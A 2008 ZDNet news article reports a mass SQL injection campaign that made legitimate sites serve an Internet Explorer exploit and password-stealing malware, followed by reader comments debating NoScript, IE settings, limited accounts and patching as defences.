Thousands of legitimate sites SQL injected to serve IE exploit

Thousands of legitimate sites SQL injected to serve IE exploit

Summary: Once again confirming the trend of having more legitimate sites serving exploits and malware than purely malicious ones, Chinese hackers have been keeping themselves busy during the last couple of days, launching massive SQL injection attacks affecting over 100,000 web sites.

TOPICS: Security

Symantec Internet Explorer Zero Day ChinaOnce again confirming the trend of having more legitimate sites serving exploits and malware than purely malicious ones, Chinese hackers have been keeping themselves busy during the last couple of days, launching massive SQL injection attacks affecting over 100,000 web sites.

The SQL injection attacks serving the just patched Internet Explorer XML parsing exploit, are launched by several different Chinese hacking groups, and with several exceptions, are primarily targeting Asian countries which is a pretty logical move given the fact that it's a password stealing malware for online games that is served at the bottom line.

Which is the most targeted country?

According to some stats from Symantec, China ironically remains the most actively targeted country by the IE exploit, ironically in the sense that it was Chinese researchers that leaked the exploit at the first place. Moreover, the 100,000 web sites cited as being infected by Symantec, should be taken as a very conservative metric, since more domains are being injected and as previous campaigns, the number of affected sites could change pretty fast.

SQL Injection Internet Explorer Zero DayConsider for a while the big picture. With or without a patch for the IE exploit, committing cybercrime through the exploitation of already patched client-side vulnerabilities would continue growing - it has been throughout the entire 2008. Despite being old-fashioned compared to Russian cybercriminals that would have included the exploit within their web malware exploitation kits and started serving banker malware instead of password stealing malware, the Chinese attackers appear to be well aware of this trend, and therefore all of the IE exploit serving sites are also serving several other exploits targeting Adobe's Flash, Acrobat Reader and RealPlayer for starters.

Recent studies continue emphasizing on the fact that millions of users not only continue browsing the web using insecure browsers, but also, are so browser vulnerabilities centered and they ignore the rest of the software running on their PCs as a potential infection vector given they're running an insecure versions of it - and yes they are. Cybercriminals are aware of this insecure Internet browsing, and are therefore including sets of exploits targeting each and every version known to be vulnerable of a particular software in order to increase the chances for a successful infection. This particular SQL injection attack is the most recent example of this mentality.

In 2008, cybercriminals continue infecting thousands of new hosts on daily basis using 2007's critical vulnerabilities, because instead of patching vulnerable software, the majority of end users remain comfortable with their false feeling of security.

Topic: Security

Dancho Danchev

About Dancho Danchev

Dancho Danchev is an independent security consultant and cyber threats analyst, with extensive experience in open source intelligence gathering, malware and cybercrime incident response.

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.


Log in or register to join the discussion
  • This is why Firefox + NoScript isn't a magic fix

    Before any Firefox zealots start going nuts, Firefox + NoScript is my browser configuration of choice.

    That being said, people do have to be careful when they use the "Allow <site>" option of NoScript because even legitimate, trustworthy sites are sometimes used to distribute malware. I really and truly wish that Mozilla would implement a Protected Mode for FireFox under Vista.
    • Not magic, but more effective than you think

      Even if the compromised site is in your whitelist, allowed to run JavaScript, the actual attack is thrown by a tiny IFrame or a script inclusion which just pulls the malicious code from an external server in control of the attacker (usually in a Chinese or Russian domain registered for this purpose) and surely not in your whitelist. This is quite reasonable: since SQL vulnerabilities are not suitable for injecting large chunks of malicious code, and such an attack cannot write Flash applets or JavaScript files on the filesystem of the compromised server, the attacker needs to download them from somewhere else.
      Therefore NoScript?s fine grained script blocking prevents them from being loaded and effectively defeats the attack.
      Giorgio Maone
      • Excellent info

        Thanks for that info, much appreciated.
      • How is this different than IE's whitelist for scripts? (nt)

        • Er, you are still vulnerable in IE7

          You cannot disable iframes
          • What?

            So why is their a setting for it in the Security tab in Internet Options?
          • You cannot disable iframes

            You can disable programs from loading from within iframes, but you cannot disable iframes in IE7. Try visiting a page containing iframes with your iframe option disabled and check for yourself. For a fully patched IE, the option to disable programs from within iframes is enough, but for a known unpatched vulnerability, with drive by downloads,
            the restriction may possibly be overcome.
      • No Script Still no magic bullet

        Since you don't need a script to download a malicious file. So even if it is not in the "No Script" whitelist you will have malware on your system.
        • You're Making Wrong Assumptions :)

          You're assuming you just need to download an exe to get the malware. You need to download [b]and execute it[/b], instead. Firefox never allows an executable to be launched by the browser upon download. To do that, an attacker needs to exploit some vulnerability, and this almost always involves some non-trivial JavaScript and/or plugin magic, which is actually [b]blocked by NoScript[/b].
          Giorgio Maone
          • My experience with it..

            I have several bad site blockers installed in IE 7, which block the server redirects; also active X registry settings(Spyware Blaster), Spybot Immunizer disables a lot of crack controls present on web pages, the Tea Timer prevents some of them from making registry changes in the first place.

            Commodo Firewall Pro prevents the modification of files in some instances, and blocks the outgoing server requests in others.

            I still get hit once and a while when these attacks pop out of page ads, but since I keep my Java, and Adobe reader/flash updated my AV(ESET) is easily able to thwart the attack.

            It seems most of these vectors take advantage of one vulnerability or another of applications; if they are updated this may not happen most of the time. A blended defense can mitigate it. My clients refuse to do without web functionality and I refuse to knuckle under to the criminals.

            I will continue to operate with iFrames, Active X, and Java enabled for the near future. I'm not saying I'm invulnerable, but have won the day on every attack so far.

            Running in restricted Windows rights goes a LONG way toward prevention.
          • You are Right. However...

            While you are right, the hole in IE allows execution of any command w/o user intervention. While it is being automatically spread using scripts it is really an XML CDATA binding error that will execute ANYTHING you tell it to once the stack has been corrupted.

            This is specifically an IE thing. Even if the script (which is just an automated implementation of the CDATA bind) were to run in FF it would have no effect because the FF stack does not get corrupted by the malformed XML.
        • If you wanted to

          You could of course make the purposeful choice to
          download and run a file.

          See, these things called exploits, they don't give you
          that choice. They force it on you, and that's the
          whole problem. ;)
      • To the point

        Thank you for being direct and to the point instead of the babble.

        Great info
    • Does Bill Gates know you use Firefox? [nt]

    • NoScript in FF == security level:high in IE?

      How is using NoScript in FF is different from setting security level to "high" in IE?

      Besides, the real problem is not that you or I can change the settings or add a plugin; the real problem is that there are so many users that don't have any clue and don't patch their systems, which is pretty much a no-brainer on itself in Windows, with automatic updates.
      • NoScript is much better

        [i]Disclaimer: I'm NoScript's author[/i]

        1. NoScript allows you to whitelist a site with one click, while Microsoft's zone are very painful to use
        2. NoScript's whitelist is guarded by the best anti-XSS filters currently available on the client side, while IE7 has nothing like that and IE8 has a limited copycat** of NoScript's.
        3. NoScript offers many other unique security enhancements which go far beyond "security level:high", e.g. anti-Clickjacking protection, see

        Giorgio Maone
        • No addon or security suite is better than

          Running with least privilege as a standard (limited) user. NoScript is awesome and I use it as a added layer of protection, but it is no substitute for a properly configured user account.
          • Limited Accounts (and sandboxes) are Overrated

            Sure I'm a big fan of least privilege, and if you're using an "administrator" or "root" account to browse the web you're inviting full system infection.
            On the other end, even if you use a limited account (and, let me repeat, you really should), you can as easily be victim of an effective attack: accessing your personal data, stealing your sensitive documents, turning your PC in a spam bot (you can send email from your limited account, can't you?) and so on. Basically anything your "limited" account can do, an attacker is enabled to do as well. The main difference with a root/administrator attack is that your wife's account is still OK and you'll have an easier time in cleaning up your PC, when you realize you've been owned.
            Even "protected mode" and sandboxes are overrated: if you think about it, there's a lot of malicious thing an attacker in your browser can do without accessing your local filesystem, now that we're moving more and more vital data (bank accounts, email, social relationships...) in the "cloud"*. Your local resources will become even less valuable in the future, if this trend is confirmed.
            So, the best approach is layered, and the first, most important and most effective layer is always [b]don't allow any untrusted code to run[/b].

            Giorgio Maone
          • Not once has

            anyone brought a computer to me to be cleaned from malware that used a limited user account. All the systems I have cleaned were run wide opened, including some that used Firefox and NoScript. Besides, the point of my last post was that layered security starts at least privileged. Unless your security model starts with a firm foundation, (least privileged) all your other defenses are of little use, including NoScript. So no, running with least privilege is not overrated.

            (I did say that I used No Script as a added layer of protection in the other post. I was in no way implying that people should avoid NoScript and was pretty clear about it in my previous post.)
          • Giorgio is right...

            Especially if you have any application with a vulnerability that allows the script to take control of your computer with newly won administrative rights. Secunia PSI 1.0 goes a long way in preventing this by helping you keep your applications, add-on, ect. up to date.

            It even finds end of life or individual .exe files leftover from previous uninstalls, that could compromise your computer even in restricted mode.

            I seen these web pest in action when they try to gain administrative access using, say, Adobe reader for PDFs. If the application is not updated before the attack, the bug can take control very rapidly and even subvert some good antivirus softwares that have the definition in their update files.

            Some scripts are even "Sandboxie" aware and can usually break out into the session using several subversion techniques. But it would still be wise to use it on the admin side, if at least for just one more stumbling block for the crackers.